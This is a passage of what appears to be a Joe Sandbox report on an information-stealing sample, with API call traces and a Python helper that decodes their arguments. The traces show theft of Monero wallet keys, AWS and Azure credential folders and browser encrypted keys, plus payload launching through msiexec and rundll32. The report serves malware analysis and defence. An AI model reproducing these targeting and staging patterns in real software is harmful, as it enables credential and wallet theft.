                                    • InternetCloseHandle.WININET(00000000), ref: 00FE4EC5
                                    • HttpOpenRequestA.WININET(00000000,0180EBC0,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE4B15
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE4ECF
                                    Strings
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated dumps and IDA snapshot: same set as listed for the previous function (module image at 00FE0000, snapshot hcaresult_0_2_fe0000_file.jbxd)
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: fc814eaa07c9bc007434521f3c3f28017581faac67c6b8b6e5d4f4c3023cdf5c
                                    • Instruction ID: 2c8d6fd681f70be958437b09f4d82fa816f1a730785d907b61bfc45bf3c2fa91
                                    • Opcode Fuzzy Hash: fc814eaa07c9bc007434521f3c3f28017581faac67c6b8b6e5d4f4c3023cdf5c
                                    • Instruction Fuzzy Hash: 3D120FB191011CAADB25EB50DC92FFEB378AF14340F5041A9B20A625A5EFB42F49DF61
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0180D5E0,00000000,?,0100144C,00000000,?,?), ref: 00FECA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FECA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00FECA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FECAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FECAD9
                                    • StrStrA.SHLWAPI(?,0180D5F8,01000B52), ref: 00FECAF7
                                    • StrStrA.SHLWAPI(00000000,0180D640), ref: 00FECB1E
                                    • StrStrA.SHLWAPI(?,0180D9C8,00000000,?,01001458,00000000,?,00000000,00000000,?,01808F40,00000000,?,01001454,00000000,?), ref: 00FECCA2
                                    • StrStrA.SHLWAPI(00000000,0180D9E8), ref: 00FECCB9
                                      • Part of subcall function 00FEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FEC871
                                      • Part of subcall function 00FEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FEC87C
                                    • StrStrA.SHLWAPI(?,0180D9E8,00000000,?,0100145C,00000000,?,00000000,01809010), ref: 00FECD5A
                                    • StrStrA.SHLWAPI(00000000,01809230), ref: 00FECD71
                                      • Part of subcall function 00FEC820: lstrcat.KERNEL32(?,01000B46), ref: 00FEC943
                                      • Part of subcall function 00FEC820: lstrcat.KERNEL32(?,01000B47), ref: 00FEC957
                                      • Part of subcall function 00FEC820: lstrcat.KERNEL32(?,01000B4E), ref: 00FEC978
                                    • lstrlen.KERNEL32(00000000), ref: 00FECE44
                                    • CloseHandle.KERNEL32(00000000), ref: 00FECE9C
                                    Strings
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated dumps and IDA snapshot: same set as listed for the previous function (module image at 00FE0000, snapshot hcaresult_0_2_fe0000_file.jbxd)
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: c223659b1fb90df1d8a9c41bd0f07afd6022612b8931c06ced31fc1aac2982cd
                                    • Instruction ID: 5180a4461f5d9d88b21d4a543c521a85a5894dbf8f50ab2adb53b267dbeb9397
                                    • Opcode Fuzzy Hash: c223659b1fb90df1d8a9c41bd0f07afd6022612b8931c06ced31fc1aac2982cd
                                    • Instruction Fuzzy Hash: 8DE112B180010CABDB25EFA0DC95FFE7778AF14340F404169F20A675A5EF786A4ADB61
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • RegOpenKeyExA.ADVAPI32(00000000,0180B4F0,00000000,00020019,00000000,010005B6), ref: 00FF83A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FF8426
                                    • wsprintfA.USER32 ref: 00FF8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FF847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF8499
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                    Strings
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated dumps and IDA snapshot: same set as listed for the previous function (module image at 00FE0000, snapshot hcaresult_0_2_fe0000_file.jbxd)
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: f178c7e22433d7e3dc7e730d66dd922eef76b32a6fa5716ae359b4f8230cbad5
                                    • Instruction ID: 393a0897674518d88edf841518d19b19e4fb821684a52ba36a03d9f88c324a69
                                    • Opcode Fuzzy Hash: f178c7e22433d7e3dc7e730d66dd922eef76b32a6fa5716ae359b4f8230cbad5
                                    • Instruction Fuzzy Hash: 1F810AB191111CAADB24DF50DC95FEE77B8BF08740F008298E209A6590DF756F86DF90
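The argument columns in the API records above are raw stack values. For the calls that matter when reading them (the two WinINet request routines at 00FE59F8/00FE4915, the CreateFileA/SetFilePointer reader at 00FECA6C, and the RegOpenKeyExA walk at 00FF83A4) the interesting positions are documented flag or enum parameters. The following Python is an added worked example for this page, not Joe Sandbox output and not Stealc code: it parses the report's "Api.MODULE(args), ref: ADDR" line layout and maps those positions to their Win32 names. The trace lines embedded in it are copied from the records above; the decoding tables hold only standard constant values, argument positions come from the documented prototypes (the sandbox prints trailing stack slots beyond the prototype, which the decoder ignores), and any API not listed in ARG_DECODERS is passed through undecoded.

```python
"""Decode the hex argument columns of the Joe Sandbox API records above.

Added example for this report (not sandbox output, not Stealc code). The
tables hold documented Win32 constant values; ARG_DECODERS says which
argument position of each traced API carries a flag or enum. Lines in
TRACE_LINES are copied from the records above.
"""
import re
from typing import Dict, List, Optional

# --- documented Win32 constants ---------------------------------------------
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_FLAGS = {                       # bit flags for HttpOpenRequest dwFlags
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
ACCESS_MASK = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}
REG_SAM = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}

# API name -> {argument index: (table, or None for a plain size; is_bitmask)}
ARG_DECODERS = {
    "InternetOpenA":    {1: (INTERNET_OPEN_TYPE, False)},
    "InternetConnectA": {5: (INTERNET_SERVICE, False)},
    "HttpOpenRequestA": {6: (INTERNET_FLAGS, True)},
    "InternetReadFile": {2: (None, False)},          # dwNumberOfBytesToRead
    "CreateFileA":      {1: (ACCESS_MASK, True), 2: (SHARE_MODE, True),
                         4: (CREATE_DISPOSITION, False)},
    "SetFilePointer":   {3: (MOVE_METHOD, False)},
    "RegOpenKeyExA":    {3: (REG_SAM, False)},
}

# Copied from the records above (bullet and indentation dropped).
TRACE_LINES = [
    "InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FE59F8",
    "InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE5B93",
    "HttpOpenRequestA.WININET(00000000,0180EBC0,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE5BF8",
    "InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FE5F4C",
    "InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FE4E49",
    "CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0180D5E0,00000000,?,0100144C,00000000,?,?), ref: 00FECA6C",
    "SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FECA89",
    "RegOpenKeyExA.ADVAPI32(00000000,0180B4F0,00000000,00020019,00000000,010005B6), ref: 00FF83A4",
]

LINE_RE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")


def parse_trace_line(line: str) -> Optional[dict]:
    """Split 'Api.MODULE(a,b,c), ref: ADDR' into its parts; None if no match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    api, module, args, ref = m.groups()
    return {"api": api, "module": module, "ref": ref,
            "args": [a.strip() for a in args.split(",")]}


def decode_value(raw: str, table: Optional[Dict[int, str]], bitmask: bool) -> str:
    """Turn one hex argument into a symbolic name (or OR-ed names for bit flags)."""
    if raw == "?":                       # the sandbox could not resolve this slot
        return "?"
    try:
        value = int(raw, 16)
    except ValueError:                   # string/symbolic argument, keep as-is
        return raw
    if table is None:                    # plain size argument
        return f"{value} ({value:#x})"
    if not bitmask:
        return table.get(value, f"{value:#x}")
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)       # bits no table entry explains
    if leftover:
        names.append(f"{leftover:#x}")
    return " | ".join(names) if names else "0"


def decode_trace_line(line: str) -> Optional[dict]:
    """Parse a line and decode the argument positions ARG_DECODERS knows about."""
    rec = parse_trace_line(line)
    if rec is None:
        return None
    decoded = {}
    for idx, (table, bitmask) in ARG_DECODERS.get(rec["api"], {}).items():
        if idx < len(rec["args"]):
            decoded[idx] = decode_value(rec["args"][idx], table, bitmask)
    rec["decoded"] = decoded
    return rec


def decode_all(lines: List[str] = TRACE_LINES) -> List[dict]:
    """Decode every line; lines that do not parse are dropped, never guessed."""
    return [r for r in (decode_trace_line(l) for l in lines) if r is not None]


if __name__ == "__main__":
    for rec in decode_all():
        fields = ", ".join(f"arg{i}={v}" for i, v in sorted(rec["decoded"].items()))
        print(f'{rec["ref"]} {rec["api"]:18} {fields}')
```

Read this way, both request routines open WinINet with INTERNET_OPEN_TYPE_DIRECT, connect with INTERNET_SERVICE_HTTP, and open the request with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE (no INTERNET_FLAG_SECURE, so plain HTTP); the responses are pulled in 199-byte (00FE5F4C) and 1999-byte (00FE4E49) InternetReadFile chunks. The reader at 00FECA6C opens its target GENERIC_READ / FILE_SHARE_READ / OPEN_EXISTING and sizes it with SetFilePointer(FILE_END) before GetFileSize, and the registry walk at 00FF83A4 opens keys with KEY_READ. The 05F5E0FF visible beside GetProcessHeap at 00FED0C7 is 99,999,999 decimal, which is the stack slot where the RtlAllocateHeap size would sit.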
                                    APIs
                                      • Part of subcall function 00FF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FF8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00FF4DCD
                                      • Part of subcall function 00FF4910: wsprintfA.USER32 ref: 00FF492C
                                      • Part of subcall function 00FF4910: FindFirstFileA.KERNEL32(?,?), ref: 00FF4943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00FF4E59
                                      • Part of subcall function 00FF4910: StrCmpCA.SHLWAPI(?,01000FDC), ref: 00FF4971
                                      • Part of subcall function 00FF4910: StrCmpCA.SHLWAPI(?,01000FE0), ref: 00FF4987
                                      • Part of subcall function 00FF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FF4B7D
                                      • Part of subcall function 00FF4910: FindClose.KERNEL32(000000FF), ref: 00FF4B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FF4EE5
                                      • Part of subcall function 00FF4910: wsprintfA.USER32 ref: 00FF49B0
                                      • Part of subcall function 00FF4910: StrCmpCA.SHLWAPI(?,010008D2), ref: 00FF49C5
                                      • Part of subcall function 00FF4910: wsprintfA.USER32 ref: 00FF49E2
                                      • Part of subcall function 00FF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00FF4A1E
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,0180EAC0), ref: 00FF4A4A
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,01000FF8), ref: 00FF4A5C
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,?), ref: 00FF4A70
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,01000FFC), ref: 00FF4A82
                                      • Part of subcall function 00FF4910: lstrcat.KERNEL32(?,?), ref: 00FF4A96
                                      • Part of subcall function 00FF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00FF4AAC
                                      • Part of subcall function 00FF4910: DeleteFileA.KERNEL32(?), ref: 00FF4B31
                                    Strings
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated dumps and IDA snapshot: same set as listed for the previous function (module image at 00FE0000, snapshot hcaresult_0_2_fe0000_file.jbxd)
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 431791c7df35d1184177cb1453df234fe83823db34d4d3d1aabb567457093541
                                    • Instruction ID: f33d159caf2d2a5851073ab6032603eae0cc3fd686d4d93d01cdbeb2566fa1f8
                                    • Opcode Fuzzy Hash: 431791c7df35d1184177cb1453df234fe83823db34d4d3d1aabb567457093541
                                    • Instruction Fuzzy Hash: 374154B9A4020867DB60F770EC47FED7238AF64740F004558B689660C5EEF89B99DB92
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FF906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: edf1255768972d5dddcdf449e0720ad12f319399e706cb1aa33ee2a7cb76ea62
                                    • Instruction ID: f1b5f758146b814756cff4783122c9b8c6794b39762b775f89d81bbc3030a6f0
                                    • Opcode Fuzzy Hash: edf1255768972d5dddcdf449e0720ad12f319399e706cb1aa33ee2a7cb76ea62
                                    • Instruction Fuzzy Hash: 3E710E75900208ABDB24DFE4EC89FEEB7B8BF48700F108518F616A7694DB74A905DB61
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF31C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF34EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: de9c607173b41d574db8aa4e3d0465015711ffb816d9b6c790d308550fa966de
                                    • Instruction ID: 926cd59ed7f5ad4ba5e682c3ddf564fc8ae84cd85ced2a5462663b5598db964e
                                    • Opcode Fuzzy Hash: de9c607173b41d574db8aa4e3d0465015711ffb816d9b6c790d308550fa966de
                                    • Instruction Fuzzy Hash: B51201B181010CAADB15FB90DC92FFDB778AF14340F504169F60A661A5EFB82B4ADF52
                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE6280: InternetOpenA.WININET(01000DFE,00000001,00000000,00000000,00000000), ref: 00FE62E1
                                      • Part of subcall function 00FE6280: StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE6303
                                      • Part of subcall function 00FE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6335
                                      • Part of subcall function 00FE6280: HttpOpenRequestA.WININET(00000000,GET,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE6385
                                      • Part of subcall function 00FE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FE63BF
                                      • Part of subcall function 00FE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE63D1
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF5318
                                    • lstrlen.KERNEL32(00000000), ref: 00FF532F
                                      • Part of subcall function 00FF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FF8E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00FF5364
                                    • lstrlen.KERNEL32(00000000), ref: 00FF5383
                                    • lstrlen.KERNEL32(00000000), ref: 00FF53AE
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: e9a9d9238cdac9651488797f01dc99fe192249ef87847e5ce7d13e950565717b
                                    • Instruction ID: 73e7e4218fb74d948f42b7b525a75ec8481507501e168e989ea90242317654a2
                                    • Opcode Fuzzy Hash: e9a9d9238cdac9651488797f01dc99fe192249ef87847e5ce7d13e950565717b
                                    • Instruction Fuzzy Hash: 77510EB191014CDBDB14FF60CD96AFD7779AF10340F508018FA0A5A6A1EF786B15EB52
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 42036d81160380d02fe4a28be08eee550078efed1d9e28390de11a56db5ea059
                                    • Instruction ID: 39d004bc829972db7d48db8ed29d9ae147985260855bf6903c4704a81db1d605
                                    • Opcode Fuzzy Hash: 42036d81160380d02fe4a28be08eee550078efed1d9e28390de11a56db5ea059
                                    • Instruction Fuzzy Hash: 88C1A5B690011DABCB24EF60DC89FFE7378BF54304F004598F20AA7251EA74AA95DF91
                                    APIs
                                      • Part of subcall function 00FF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FF8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF42EC
                                    • lstrcat.KERNEL32(?,0180E470), ref: 00FF430B
                                    • lstrcat.KERNEL32(?,?), ref: 00FF431F
                                    • lstrcat.KERNEL32(?,0180D598), ref: 00FF4333
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FF8D90: GetFileAttributesA.KERNEL32(00000000,?,00FE1B54,?,?,0100564C,?,?,01000E1F), ref: 00FF8D9F
                                      • Part of subcall function 00FE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FE9D39
                                      • Part of subcall function 00FE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE99EC
                                      • Part of subcall function 00FE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FE9A11
                                      • Part of subcall function 00FE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FE9A31
                                      • Part of subcall function 00FE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FE148F,00000000), ref: 00FE9A5A
                                      • Part of subcall function 00FE99C0: LocalFree.KERNEL32(00FE148F), ref: 00FE9A90
                                      • Part of subcall function 00FE99C0: CloseHandle.KERNEL32(000000FF), ref: 00FE9A9A
                                      • Part of subcall function 00FF93C0: GlobalAlloc.KERNEL32(00000000,00FF43DD,00FF43DD), ref: 00FF93D3
                                    • StrStrA.SHLWAPI(?,0180E578), ref: 00FF43F3
                                    • GlobalFree.KERNEL32(?), ref: 00FF4512
